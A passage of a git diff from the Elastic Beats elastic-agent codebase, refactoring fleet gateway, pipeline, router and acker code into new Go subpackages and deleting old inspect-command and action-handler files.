@@ func TestRetriesOnFailures(t *testing.T) { return resp, nil }), - dispatcher.Answer(func(actions ...action) error { + dispatcher.Answer(func(actions ...fleetapi.Action) error { require.Equal(t, 0, len(actions)) return nil }), @@ -462,7 +465,7 @@ func TestRetriesOnFailures(t *testing.T) { Backoff: backoffSettings{Init: 10 * time.Minute, Max: 20 * time.Minute}, }, func( t *testing.T, - gateway FleetGateway, + gateway gateway.FleetGateway, client *testingClient, dispatcher *testingDispatcher, scheduler *scheduler.Stepper, diff --git a/x-pack/elastic-agent/pkg/agent/application/noop_status_controller.go b/x-pack/elastic-agent/pkg/agent/application/gateway/fleet/noop_status_controller.go similarity index 98% rename from x-pack/elastic-agent/pkg/agent/application/noop_status_controller.go rename to x-pack/elastic-agent/pkg/agent/application/gateway/fleet/noop_status_controller.go index b229f3cff08..59994d1d454 100644 --- a/x-pack/elastic-agent/pkg/agent/application/noop_status_controller.go +++ b/x-pack/elastic-agent/pkg/agent/application/gateway/fleet/noop_status_controller.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package fleet import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" diff --git a/x-pack/elastic-agent/pkg/agent/application/fleet_gateway_local.go b/x-pack/elastic-agent/pkg/agent/application/gateway/fleetserver/fleet_gateway_local.go similarity index 81% rename from x-pack/elastic-agent/pkg/agent/application/fleet_gateway_local.go rename to x-pack/elastic-agent/pkg/agent/application/gateway/fleetserver/fleet_gateway_local.go index e25e7792fb1..a1e7d2bbcca 100644 --- a/x-pack/elastic-agent/pkg/agent/application/fleet_gateway_local.go +++ b/x-pack/elastic-agent/pkg/agent/application/gateway/fleetserver/fleet_gateway_local.go @@ -2,16 +2,19 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package fleetserver import ( "context" "time" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/gateway" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" ) const gatewayWait = 2 * time.Second @@ -38,17 +41,18 @@ type fleetServerWrapper struct { log *logger.Logger cfg *configuration.FleetAgentConfig injectedCfg *config.Config - wrapped FleetGateway - emitter emitterFunc + wrapped gateway.FleetGateway + emitter pipeline.EmitterFunc } -func wrapLocalFleetServer( +// New creates a new fleet server gateway wrapping another fleet gateway. +func New( ctx context.Context, log *logger.Logger, cfg *configuration.FleetAgentConfig, rawConfig *config.Config, - wrapped FleetGateway, - emitter emitterFunc) (FleetGateway, error) { + wrapped gateway.FleetGateway, + emitter pipeline.EmitterFunc) (gateway.FleetGateway, error) { if cfg.Server == nil { // not running a local Fleet Server return wrapped, nil @@ -78,8 +82,8 @@ func (w *fleetServerWrapper) Start() error { } // SetClient sets the client for the wrapped gateway. -func (w *fleetServerWrapper) SetClient(client clienter) { - w.wrapped.SetClient(client) +func (w *fleetServerWrapper) SetClient(c client.Sender) { + w.wrapped.SetClient(c) } func injectFleetServer(rawConfig *config.Config) (*config.Config, error) { diff --git a/x-pack/elastic-agent/pkg/agent/application/gateway/gateway.go b/x-pack/elastic-agent/pkg/agent/application/gateway/gateway.go new file mode 100644 index 00000000000..c14ab8d38c8 --- /dev/null +++ b/x-pack/elastic-agent/pkg/agent/application/gateway/gateway.go @@ -0,0 +1,19 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package gateway + +import "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" + +// FleetGateway is a gateway between the Agent and the Fleet API, it's take cares of all the +// bidirectional communication requirements. The gateway aggregates events and will periodically +// call the API to send the events and will receive actions to be executed locally. +// The only supported action for now is a "ActionPolicyChange". +type FleetGateway interface { + // Start starts the gateway. + Start() error + + // Set the client for the gateway. + SetClient(client.Sender) +} diff --git a/x-pack/elastic-agent/pkg/agent/application/global_config.go b/x-pack/elastic-agent/pkg/agent/application/global_config.go deleted file mode 100644 index cdc6dda02e9..00000000000 --- a/x-pack/elastic-agent/pkg/agent/application/global_config.go +++ /dev/null @@ -1,39 +0,0 @@ -// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one -// or more contributor license agreements. Licensed under the Elastic License; -// you may not use this file except in compliance with the Elastic License. - -package application - -import ( - "runtime" - - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" - - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" -) - -// InjectAgentConfig injects config to a provided configuration. -func InjectAgentConfig(c *config.Config) error { - globalConfig := agentGlobalConfig() - if err := c.Merge(globalConfig); err != nil { - return errors.New("failed to inject agent global config", err, errors.TypeConfig) - } - - return nil -} - -// agentGlobalConfig gets global config used for resolution of variables inside configuration -// such as ${path.data}. -func agentGlobalConfig() map[string]interface{} { - return map[string]interface{}{ - "path": map[string]interface{}{ - "data": paths.Data(), - "config": paths.Config(), - "home": paths.Home(), - "logs": paths.Logs(), - }, - "runtime.os": runtime.GOOS, - "runtime.arch": runtime.GOARCH, - } -} diff --git a/x-pack/elastic-agent/pkg/agent/application/handler_action_application.go b/x-pack/elastic-agent/pkg/agent/application/handler_action_application.go deleted file mode 100644 index 56b5ee3499c..00000000000 --- a/x-pack/elastic-agent/pkg/agent/application/handler_action_application.go +++ /dev/null @@ -1,31 +0,0 @@ -// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one -// or more contributor license agreements. Licensed under the Elastic License; -// you may not use this file except in compliance with the Elastic License. - -package application - -import ( - "context" - "fmt" - - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" -) - -type handlerAppAction struct { - log *logger.Logger -} - -func (h *handlerAppAction) Handle(ctx context.Context, a action, acker fleetAcker) error { - h.log.Debugf("handlerAppAction: action '%+v' received", a) - action, ok := a.(*fleetapi.ActionApp) - if !ok { - return fmt.Errorf("invalid type, expected ActionApp and received %T", a) - } - - _ = action - - // TODO: handle app action - - return nil -} diff --git a/x-pack/elastic-agent/pkg/agent/application/handler_default.go b/x-pack/elastic-agent/pkg/agent/application/handler_default.go deleted file mode 100644 index 8cbc1985d00..00000000000 --- a/x-pack/elastic-agent/pkg/agent/application/handler_default.go +++ /dev/null @@ -1,20 +0,0 @@ -// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one -// or more contributor license agreements. Licensed under the Elastic License; -// you may not use this file except in compliance with the Elastic License. - -package application - -import ( - "context" - - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" -) - -type handlerDefault struct { - log *logger.Logger -} - -func (h *handlerDefault) Handle(_ context.Context, a action, acker fleetAcker) error { - h.log.Errorf("HandlerDefault: action '%+v' received", a) - return nil -} diff --git a/x-pack/elastic-agent/pkg/agent/application/handler_unknown.go b/x-pack/elastic-agent/pkg/agent/application/handler_unknown.go deleted file mode 100644 index b263bf6be8d..00000000000 --- a/x-pack/elastic-agent/pkg/agent/application/handler_unknown.go +++ /dev/null @@ -1,20 +0,0 @@ -// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one -// or more contributor license agreements. Licensed under the Elastic License; -// you may not use this file except in compliance with the Elastic License. - -package application - -import ( - "context" - - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" -) - -type handlerUnknown struct { - log *logger.Logger -} - -func (h *handlerUnknown) Handle(_ context.Context, a action, acker fleetAcker) error { - h.log.Errorf("HandlerUnknown: action '%+v' received", a) - return nil -} diff --git a/x-pack/elastic-agent/pkg/agent/application/info/agent_metadata.go b/x-pack/elastic-agent/pkg/agent/application/info/agent_metadata.go index ccddf448149..ea44265141b 100644 --- a/x-pack/elastic-agent/pkg/agent/application/info/agent_metadata.go +++ b/x-pack/elastic-agent/pkg/agent/application/info/agent_metadata.go @@ -10,6 +10,7 @@ import ( "runtime" "strings" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/release" "github.com/elastic/go-sysinfo" "github.com/elastic/go-sysinfo/types" @@ -118,6 +119,21 @@ const ( hostMACKey = "host.mac" ) +// Metadata loads metadata from disk. +func Metadata() (*ECSMeta, error) { + agentInfo, err := NewAgentInfo() + if err != nil { + return nil, err + } + + meta, err := agentInfo.ECSMetadata() + if err != nil { + return nil, errors.New(err, "failed to gather host metadata") + } + + return meta, nil +} + // ECSMetadata returns an agent ECS compliant metadata. func (i *AgentInfo) ECSMetadata() (*ECSMeta, error) { hostname, err := os.Hostname() diff --git a/x-pack/elastic-agent/pkg/config/operations/enricher.go b/x-pack/elastic-agent/pkg/agent/application/info/inject_config.go similarity index 98% rename from x-pack/elastic-agent/pkg/config/operations/enricher.go rename to x-pack/elastic-agent/pkg/agent/application/info/inject_config.go index 24e2234b00c..6228a9a70bb 100644 --- a/x-pack/elastic-agent/pkg/config/operations/enricher.go +++ b/x-pack/elastic-agent/pkg/agent/application/info/inject_config.go @@ -2,13 +2,12 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package operations +package info import ( "runtime" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" ) diff --git a/x-pack/elastic-agent/pkg/agent/application/inspect_config_cmd.go b/x-pack/elastic-agent/pkg/agent/application/inspect_config_cmd.go deleted file mode 100644 index bae9f82e7f6..00000000000 --- a/x-pack/elastic-agent/pkg/agent/application/inspect_config_cmd.go +++ /dev/null @@ -1,142 +0,0 @@ -// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one -// or more contributor license agreements. Licensed under the Elastic License; -// you may not use this file except in compliance with the Elastic License. - -package application - -import ( - "fmt" - - yaml "gopkg.in/yaml.v2" - - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/capabilities" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config/operations" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" -) - -// InspectConfigCmd is an inspect subcommand that shows configurations of the agent. -type InspectConfigCmd struct { - cfgPath string -} - -// NewInspectConfigCmd creates a new inspect command. -func NewInspectConfigCmd(configPath string, -) (*InspectConfigCmd, error) { - return &InspectConfigCmd{ - cfgPath: configPath, - }, nil -} - -// Execute inspects agent configuration. -func (c *InspectConfigCmd) Execute() error { - return c.inspectConfig() -} - -func (c *InspectConfigCmd) inspectConfig() error { - fullCfg, err := operations.LoadFullAgentConfig(c.cfgPath) - if err != nil { - return err - } - - return printConfig(fullCfg) -} - -func loadConfig(configPath string) (*config.Config, error) { - rawConfig, err := config.LoadFile(configPath) - if err != nil { - return nil, err - } - - path := paths.AgentConfigFile() - - store := storage.NewDiskStore(path) - reader, err := store.Load() - if err != nil { - return nil, errors.New(err, "could not initialize config store", - errors.TypeFilesystem, - errors.M(errors.MetaKeyPath, path)) - } - - config, err := config.NewConfigFrom(reader) - if err != nil { - return nil, errors.New(err, - fmt.Sprintf("fail to read configuration %s for the elastic-agent", path), - errors.TypeFilesystem, - errors.M(errors.MetaKeyPath, path)) - } - - // merge local configuration and configuration persisted from fleet. - rawConfig.Merge(config) - - if err := InjectAgentConfig(rawConfig); err != nil { - return nil, err - } - - return rawConfig, nil -} - -func loadFleetConfig(cfg *config.Config) (map[string]interface{}, error) { - log, err := newErrorLogger() - if err != nil { - return nil, err - } - - stateStore, err := store.NewStateStoreWithMigration(log, paths.AgentActionStoreFile(), paths.AgentStateStoreFile()) - if err != nil { - return nil, err - } - - for _, c := range stateStore.Actions() { - cfgChange, ok := c.(*fleetapi.ActionPolicyChange) - if !ok { - continue - } - - fmt.Println("Action ID:", cfgChange.ID()) - return cfgChange.Policy, nil - } - return nil, nil -} - -func printMapStringConfig(mapStr map[string]interface{}) error { - l, err := newErrorLogger() - if err != nil { - return err - } - caps, err := capabilities.Load(paths.AgentCapabilitiesPath(), l, status.NewController(l)) - if err != nil { - return err - } - - newCfg, err := caps.Apply(mapStr) - if err != nil { - return errors.New(err, "failed to apply capabilities") - } - newMap, ok := newCfg.(map[string]interface{}) - if !ok { - return errors.New("config returned from capabilities has invalid type") - } - - data, err := yaml.Marshal(newMap) - if err != nil { - return errors.New(err, "could not marshal to YAML") - } - - fmt.Println(string(data)) - return nil -} - -func printConfig(cfg *config.Config) error { - mapStr, err := cfg.ToMapStr() - if err != nil { - return err - } - - return printMapStringConfig(mapStr) -} diff --git a/x-pack/elastic-agent/pkg/agent/application/inspect_output_cmd.go b/x-pack/elastic-agent/pkg/agent/application/inspect_output_cmd.go deleted file mode 100644 index 6303c23c2eb..00000000000 --- a/x-pack/elastic-agent/pkg/agent/application/inspect_output_cmd.go +++ /dev/null @@ -1,274 +0,0 @@ -// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one -// or more contributor license agreements. Licensed under the Elastic License; -// you may not use this file except in compliance with the Elastic License. - -package application - -import ( - "context" - "fmt" - - "github.com/elastic/beats/v7/libbeat/logp" - "github.com/elastic/go-sysinfo" - - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/filters" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/capabilities" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/monitoring/noop" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" -) - -// InspectOutputCmd is an inspect subcommand that shows configurations of the agent. -type InspectOutputCmd struct { - cfgPath string - output string - program string -} - -// NewInspectOutputCmd creates a new inspect command. -func NewInspectOutputCmd(configPath, output, program string) (*InspectOutputCmd, error) { - return &InspectOutputCmd{ - cfgPath: configPath, - output: output, - program: program, - }, nil -} - -// Execute tries to enroll the agent into Fleet. -func (c *InspectOutputCmd) Execute() error { - agentInfo, err := info.NewAgentInfo() - if err != nil { - return err - } - - if c.output == "" { - return c.inspectOutputs(agentInfo) - } - - return c.inspectOutput(agentInfo) -} - -func (c *InspectOutputCmd) inspectOutputs(agentInfo *info.AgentInfo) error { - rawConfig, err := loadConfig(c.cfgPath) - if err != nil { - return err - } - - cfg, err := configuration.NewFromConfig(rawConfig) - if err != nil { - return err - } - - l, err := newErrorLogger() - if err != nil { - return err - } - - if configuration.IsStandalone(cfg.Fleet) { - return listOutputsFromConfig(l, agentInfo, rawConfig, true) - } - - fleetConfig, err := loadFleetConfig(rawConfig) - if err != nil { - return err - } else if fleetConfig == nil { - return fmt.Errorf("no fleet config retrieved yet") - } - - return listOutputsFromMap(l, agentInfo, fleetConfig, false) -} - -func listOutputsFromConfig(log *logger.Logger, agentInfo *info.AgentInfo, cfg *config.Config, isStandalone bool) error { - programsGroup, err := getProgramsFromConfig(log, agentInfo, cfg, isStandalone) - if err != nil { - return err - - } - - for k := range programsGroup { - fmt.Println(k) - } - - return nil -} - -func listOutputsFromMap(log *logger.Logger, agentInfo *info.AgentInfo, cfg map[string]interface{}, isStandalone bool) error { - c, err := config.NewConfigFrom(cfg) - if err != nil { - return err - } - - return listOutputsFromConfig(log, agentInfo, c, isStandalone) -} - -func (c *InspectOutputCmd) inspectOutput(agentInfo *info.AgentInfo) error { - rawConfig, err := loadConfig(c.cfgPath) - if err != nil { - return err - } - - cfg, err := configuration.NewFromConfig(rawConfig) - if err != nil { - return err - } - - l, err := newErrorLogger() - if err != nil { - return err - } - - if configuration.IsStandalone(cfg.Fleet) { - return printOutputFromConfig(l, agentInfo, c.output, c.program, rawConfig, true) - } - - fleetConfig, err := loadFleetConfig(rawConfig) - if err != nil { - return err - } else if fleetConfig == nil { - return fmt.Errorf("no fleet config retrieved yet") - } - - return printOutputFromMap(l, agentInfo, c.output, c.program, fleetConfig, true) -} - -func printOutputFromConfig(log *logger.Logger, agentInfo *info.AgentInfo, output, programName string, cfg *config.Config, isStandalone bool) error { - programsGroup, err := getProgramsFromConfig(log, agentInfo, cfg, isStandalone) - if err != nil { - return err - - } - - for k, programs := range programsGroup { - if k != output { - continue - } - - var programFound bool - for _, p := range programs { - if programName != "" && programName != p.Spec.Cmd { - continue - } - - programFound = true - fmt.Printf("[%s] %s:\n", k, p.Spec.Cmd) - printMapStringConfig(p.Configuration()) - fmt.Println("---") - } - - if !programFound { - return fmt.Errorf("program '%s' is not recognized within output '%s', try running `elastic-agent inspect output` to find available outputs", - programName, - output) - } - - return nil - } - - return fmt.Errorf("output '%s' is not recognized, try running `elastic-agent inspect output` to find available outputs", output) - -} - -func printOutputFromMap(log *logger.Logger, agentInfo *info.AgentInfo, output, programName string, cfg map[string]interface{}, isStandalone bool) error { - c, err := config.NewConfigFrom(cfg) - if err != nil { - return err - } - - return printOutputFromConfig(log, agentInfo, output, programName, c, isStandalone) -} - -func getProgramsFromConfig(log *logger.Logger, agentInfo *info.AgentInfo, cfg *config.Config, isStandalone bool) (map[string][]program.Program, error) { - monitor := noop.NewMonitor() - router := &inmemRouter{} - ctx, cancel := context.WithCancel(context.Background()) - defer cancel() - composableCtrl, err := composable.New(log, cfg) - if err != nil { - return nil, err - } - composableWaiter := newWaitForCompose(composableCtrl) - modifiers := &configModifiers{ - Decorators: []decoratorFunc{injectMonitoring}, - Filters: []filterFunc{filters.StreamChecker}, - } - - if !isStandalone { - sysInfo, err := sysinfo.Host() - if err != nil { - return nil, errors.New(err, - "fail to get system information", - errors.TypeUnexpected) - } - modifiers.Filters = append(modifiers.Filters, injectFleet(cfg, sysInfo.Info(), agentInfo)) - } - - caps, err := capabilities.Load(paths.AgentCapabilitiesPath(), log, status.NewController(log)) - if err != nil { - return nil, err - } - - emit, err := emitter( - ctx, - log, - agentInfo, - composableWaiter, - router, - modifiers, - caps, - monitor, - ) - if err != nil { - return nil, err - } - - if err := emit(cfg); err != nil { - return nil, err - } - composableWaiter.Wait() - return router.programs, nil -} - -type inmemRouter struct { - programs map[string][]program.Program -} - -func (r *inmemRouter) Dispatch(id string, grpProg map[routingKey][]program.Program) error { - r.programs = grpProg - return nil -} - -func newErrorLogger() (*logger.Logger, error) { - return logger.NewWithLogpLevel("", logp.ErrorLevel) -} - -type waitForCompose struct { - controller composable.Controller - done chan bool -} - -func newWaitForCompose(wrapped composable.Controller) *waitForCompose { - return &waitForCompose{ - controller: wrapped, - done: make(chan bool), - } -} - -func (w *waitForCompose) Run(ctx context.Context, cb composable.VarsCallback) error { - err := w.controller.Run(ctx, func(vars []*transpiler.Vars) { - cb(vars) - w.done <- true - }) - return err -} - -func (w *waitForCompose) Wait() { - <-w.done -} diff --git a/x-pack/elastic-agent/pkg/agent/application/local_meta.go b/x-pack/elastic-agent/pkg/agent/application/local_meta.go deleted file mode 100644 index 540f74ad924..00000000000 --- a/x-pack/elastic-agent/pkg/agent/application/local_meta.go +++ /dev/null @@ -1,24 +0,0 @@ -// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one -// or more contributor license agreements. Licensed under the Elastic License; -// you may not use this file except in compliance with the Elastic License. - -package application - -import ( - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" -) - -func metadata() (*info.ECSMeta, error) { - agentInfo, err := info.NewAgentInfo() - if err != nil { - return nil, err - } - - meta, err := agentInfo.ECSMetadata() - if err != nil { - return nil, errors.New(err, "failed to gather host metadata") - } - - return meta, nil -} diff --git a/x-pack/elastic-agent/pkg/agent/application/local_mode.go b/x-pack/elastic-agent/pkg/agent/application/local_mode.go index 7a16951efe8..ffb59f281ff 100644 --- a/x-pack/elastic-agent/pkg/agent/application/local_mode.go +++ b/x-pack/elastic-agent/pkg/agent/application/local_mode.go @@ -10,8 +10,12 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/filters" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/router" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/stream" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/upgrade" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configrequest" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/operation" @@ -23,19 +27,11 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/server" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/dir" + acker "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/acker/noop" reporting "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/reporter" logreporter "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/reporter/log" ) -type emitterFunc func(*config.Config) error - -// ConfigHandler is capable of handling config, perform actions at it, shutdown any long running process. -type ConfigHandler interface { - HandleConfig(configrequest.Request) error - Close() error - Shutdown() -} - type discoverFunc func() ([]string, error) // ErrNoConfiguration is returned when no configuration are found. @@ -47,7 +43,7 @@ type Local struct { bgContext context.Context cancelCtxFn context.CancelFunc log *logger.Logger - router *router + router pipeline.Router source source agentInfo *info.AgentInfo srv *server.Server @@ -80,7 +76,7 @@ func newLocal( } if log == nil { - log, err = logger.NewFromConfig("", cfg.Settings.LoggingConfig) + log, err = logger.NewFromConfig("", cfg.Settings.LoggingConfig, true) if err != nil { return nil, err } @@ -106,7 +102,7 @@ func newLocal( return nil, errors.New(err, "failed to initialize monitoring") } - router, err := newRouter(log, streamFactory(localApplication.bgContext, agentInfo, cfg.Settings, localApplication.srv, reporter, monitor, statusCtrl)) + router, err := router.New(log, stream.Factory(localApplication.bgContext, agentInfo, cfg.Settings, localApplication.srv, reporter, monitor, statusCtrl)) if err != nil { return nil, errors.New(err, "fail to initialize pipeline router") } @@ -118,15 +114,15 @@ func newLocal( } discover := discoverer(pathConfigFile, cfg.Settings.Path) - emit, err := emitter( + emit, err := emitter.New( localApplication.bgContext, log, agentInfo, composableCtrl, router, - &configModifiers{ - Decorators: []decoratorFunc{injectMonitoring}, - Filters: []filterFunc{filters.StreamChecker}, + &pipeline.ConfigModifiers{ + Decorators: []pipeline.DecoratorFunc{modifiers.InjectMonitoring}, + Filters: []pipeline.FilterFunc{filters.StreamChecker}, }, caps, monitor, @@ -153,7 +149,7 @@ func newLocal( log, []context.CancelFunc{localApplication.cancelCtxFn}, reexec, - newNoopAcker(), + acker.NewAcker(), reporter, caps) uc.SetUpgrader(upgrader) diff --git a/x-pack/elastic-agent/pkg/agent/application/managed_mode.go b/x-pack/elastic-agent/pkg/agent/application/managed_mode.go index 7eb95709a7e..68902b0de72 100644 --- a/x-pack/elastic-agent/pkg/agent/application/managed_mode.go +++ b/x-pack/elastic-agent/pkg/agent/application/managed_mode.go @@ -7,15 +7,22 @@ package application import ( "context" "fmt" - "io" - "net/http" - "net/url" "github.com/elastic/go-sysinfo" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/filters" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/gateway" + fleetgateway "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/gateway/fleet" + localgateway "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/gateway/fleetserver" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/dispatcher" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/router" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/stream" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/upgrade" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" @@ -30,19 +37,20 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/server" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/acker/fleet" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/acker/lazy" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" reporting "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/reporter" fleetreporter "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/reporter/fleet" logreporter "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/reporter/log" ) -type apiClient interface { - Send( - method string, - path string, - params url.Values, - headers http.Header, - body io.Reader, - ) (*http.Response, error) +type stateStore interface { + Add(fleetapi.Action) + AckToken() string + SetAckToken(ackToken string) + Save() error + Actions() []fleetapi.Action } // Managed application, when the application is run in managed mode, most of the configuration are @@ -52,10 +60,9 @@ type Managed struct { cancelCtxFn context.CancelFunc log *logger.Logger Config configuration.FleetAgentConfig - api apiClient agentInfo *info.AgentInfo - gateway FleetGateway - router *router + gateway gateway.FleetGateway + router pipeline.Router srv *server.Server stateStore stateStore upgrader *upgrade.Upgrader @@ -76,7 +83,7 @@ func newManaged( return nil, err } - client, err := fleetapi.NewAuthWithConfig(log, cfg.Fleet.AccessAPIKey, cfg.Fleet.Kibana) + client, err := client.NewAuthWithConfig(log, cfg.Fleet.AccessAPIKey, cfg.Fleet.Kibana) if err != nil { return nil, errors.New(err, "fail to create API client", @@ -120,7 +127,7 